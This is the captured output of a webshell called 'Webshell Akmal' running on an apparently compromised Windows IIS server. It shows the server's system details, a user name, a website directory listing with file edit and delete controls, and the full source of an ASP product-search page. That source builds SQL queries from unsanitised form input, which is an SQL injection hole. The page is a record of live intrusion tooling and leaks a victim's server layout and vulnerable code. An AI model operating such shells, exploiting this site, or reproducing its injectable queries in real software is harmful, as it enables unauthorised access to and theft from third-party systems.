Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <!--#include file="conn.asp"--> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>Search Product</title> <style type="text/css"> <!-- .STYLE1 { font-family: Verdana, Arial, Helvetica, sans-serif; } a{ position:relative; text-decoration:none; color:#666666; font-weight:lighter; } a:hover{ position:relative; text-decoration:underline; } --> </style> <% searchname=request.Form("searchtext") typeid=request.Form("typeid") Session("typeid")=typeid %> </head> <body style=" text-align:center; margin:0 auto; width:1000px;background-color:#F1F1F1; margin:0 auto"> <table width="1000" border="0" cellpadding="0" cellspacing="0" style="background-color:#ffffff"> <tr> <th colspan="2" scope="col"> <% server.Execute("head.asp") %> </th> </tr> <tr> <td width="200" valign="top"> <% server.Execute("daohang.asp") %> </td> <td width="800" valign="top"> <% if len(searchname)=0 or searchname="Enter a Item#(6 digits, e.g.160823) or Keywords" then if typeid=0 then response.Redirect("index.asp") else response.Redirect("productlist.asp?typeid="&typeid&"") end if end if dim sch(50) temp1=split(searchname," ") for aa=0 to ubound(temp1) if len(temp1(aa))>0 and temp1(aa)<>" " then sch(aa)=temp1(aa) aa=aa+1 end if next if len(searchname)=6 and isnumeric(searchname)=true then set rs=server.CreateObject("adodb.recordset") sql="select * from newproductlist where productid='"&searchname&"'" rs.open sql,conn,1,1 if not rs.eof then productid=rs("productid") productname=rs("productname") price1=rs("price1") price2=rs("price2") tejia=rs("tejia") productdetail=rs("productdetail") %> <table style="width:799px;" border="0"> <tr> <td width="120"><a href="newproductdetail.asp?productid=<%=rs("productid")%>&typeid=<%=rs("typeid")%>" target="_blank"><img src="<%=rs("ImgPrev")%>" alt="1" border="0" style="width:120px"/></a></td> <td width="400"><table width="400px" height="100px" border="0" cellspacing="0" cellpadding="0" style="text-align:left; margin-left:20px;background-color:#FFFFFF"> <tr> <th scope="col"><div align="left"><a href="newproductdetail.asp?productid=<%=rs("productid")%>&typeid=<%=rs("typeid")%>" style="text-decoration:none" target="_blank"><%=rs("productname")%></a></div></th> </tr> <tr> <td></td> </tr> <tr> <td> </td> </tr> </table></td> <td valign="top" style=" text-align:left; background-color:#FFFFFF "> <% productprice=rs("price1") if rs("tejia")=1 then productprice=rs("price2") end if %> $<%=productprice%> </td> </tr> </table> <% end if set urs=server.CreateObject("adodb.recordset") usql="select * from usedproductlist where productid like '%"&searchname&"%'" urs.open usql,conn,1,1 if not urs.eof then productid=urs("productid") productname=urs("productname") price1=urs("usprice") productdetail=urs("productdetail") %> <table style="width:799px;" border="0"> <tr> <td width="120"><a href="newproductdetailused.asp?productid=<%=urs("productid")%>" target="_blank"><img src="<%=urs("ImgPrev")%>" alt="1" border="0" style="width:120px"/></a></td> <td width="400"><table width="400px" height="100px" border="0" cellspacing="0" cellpadding="0" style="text-align:left; margin-left:20px;background-color:#FFFFFF"> <tr> <th scope="col"><div align="left"><a href="newproductdetailused.asp?productid=<%=urs("productid")%>" style="text-decoration:none" target="_blank"><%=urs("productname")%></a></div></th> </tr> <tr> <td></td> </tr> <tr> <td> </td> </tr> </table></td> <td valign="top" style=" text-align:left; background-color:#FFFFFF "> <% productprice=urs("usprice") %> $<%=productprice%> </td> </tr> </table> <% end if else dim product(3000,8) ss=0 for ii=0 to aa-1 if len(sch(ii))>0 then set rs=server.CreateObject("adodb.recordset") sql="select * from newproductlist where productname like '%"&sch(ii)&"%'" rs.open sql,conn,1,1 do while not rs.eof product(ss,0)=rs("productid") product(ss,1)=rs("productname") product(ss,2)=rs("typeid") product(ss,3)=rs("ImgPrev") product(ss,4)=rs("productdetail") product(ss,5)=rs("price1") product(ss,6)=rs("price2") product(ss,7)=rs("tejia") ss=ss+1 rs.movenext loop end if next dim usedproduct(100,8) uss=0 for ii=0 to aa-1 if len(sch(ii))>0 then set urs=server.CreateObject("adodb.recordset") usql="select * from usedproductlist where productname like '%"&sch(ii)&"%' or productid like '%"&sch(ii)&"%'" urs.open usql,conn,1,1 do while not urs.eof usedproduct(uss,0)=urs("productid") usedproduct(uss,1)=urs("productname") usedproduct(uss,2)="" usedproduct(uss,3)=urs("ImgPrev") usedproduct(uss,4)=urs("productdetail") usedproduct(uss,5)=urs("usprice") usedproduct(uss,6)="" usedproduct(uss,7)="" uss=uss+1 urs.movenext loop end if next for sss=0 to ss-1 if len(product(sss,0))>0 and Isnumeric(product(sss,0))=true then %> <table style="width:799px;" border="0"> <tr> <td width="120"><a href="newproductdetail.asp?productid=<%=product(sss,0)%>&typeid=<%=product(sss,2)%>" target="_blank"><img src="<%=product(sss,3)%>" alt="1" border="0" style="width:120px"/></a></td> <td width="400"><table width="400px" height="100px" border="0" cellspacing="0" cellpadding="0" style="text-align:left; margin-left:20px;background-color:#FFFFFF"> <tr> <th scope="col"><div align="left"><a href="newproductdetail.asp?productid=<%=product(sss,0)%>&typeid=<%=product(sss,2)%>" style="text-decoration:none" target="_blank"><%=product(sss,1)%></a></div></th> </tr> <tr> <td></td> </tr> <tr> <td> </td> </tr> </table></td> <td valign="top" style=" text-align:left; background-color:#FFFFFF "> <% productprice=product(sss,5) if product(sss,7)=1 then productprice=product(sss,6) end if %> $<%=productprice%> </td> </tr> </table> <% end if next for usss=0 to uss-1 if len(usedproduct(usss,0))>0 then %> <table style="width:799px;" border="0"> <tr> <td width="120"><a href="newProductDetailused.asp?productid=<%=usedproduct(usss,0)%>" target="_blank"><img src="<%=usedproduct(usss,3)%>" alt="1" border="0" style="width:120px"/></a></td> <td width="400"><table width="400px" height="100px" border="0" cellspacing="0" cellpadding="0" style="text-align:left; margin-left:20px;background-color:#FFFFFF"> <tr> <th scope="col"><div align="left"><a href="newProductDetailused.asp?productid=<%=usedproduct(usss,0)%>" style="text-decoration:none" target="_blank"><%=usedproduct(usss,1)%></a></div></th> </tr> <tr> <td></td> </tr> <tr> <td> </td> </tr> </table></td> <td valign="top" style=" text-align:left; background-color:#FFFFFF "> <% productprice=usedproduct(usss,5) %> $<%=productprice%> </td> </tr> </table> <% end if next for ssss=0 to ss-1 product(ssss,0)="" next for ussss=0 to uss-1 usedproduct(ussss,0)="" next end if %> </td> </tr> <tr> <td colspan="2"> <% server.Execute("bottom.asp") %> </td> </tr> </table> <% conn.close set conn=nothing %> </body> </html>